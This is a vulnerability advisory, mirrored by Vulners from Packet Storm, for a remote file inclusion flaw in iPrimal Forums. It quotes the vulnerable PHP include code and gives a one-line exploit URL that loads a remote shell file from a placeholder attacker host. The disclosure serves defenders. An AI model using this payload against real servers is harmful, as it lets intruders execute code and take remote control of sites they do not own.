Lucene search
K

iPrimal-rfi.txt

🗓️ 09 Nov 2006 00:00:00Reported by Bl0od3rType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 20 Views

iPrimal Forums Remote File Inclusion vulnerability allows malicious file access via URL parameter.

Code
`~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
iPrimal Forums Remote File Inclusion  
Download:http://ipigroup.org/downloads/forums.zip  
Found by Bl0od3r  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Vulnerable Code: #line 126-129  
.....  
if($_GET['p'] == ''){  
  
echo 'Please select an item from the menu above.';  
  
}else{  
  
include($_GET['p'].'.php');  
.....  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Affected File:  
/admin/index.php =]  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Vulnerability:  
http://host.com/admin/index.php?p=http://evil.com/shell.txt?  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Greetz:evilcookie,eddy14,matrix_killer  
Special Greetz to:str0ke!  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation